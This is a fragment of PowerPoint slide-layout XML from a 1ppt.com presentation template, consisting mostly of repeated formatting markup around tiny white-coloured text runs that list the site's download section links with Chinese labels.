              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout34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34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34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34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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout35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35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35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35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35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35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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout35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35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35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35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36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36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36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36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36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36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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
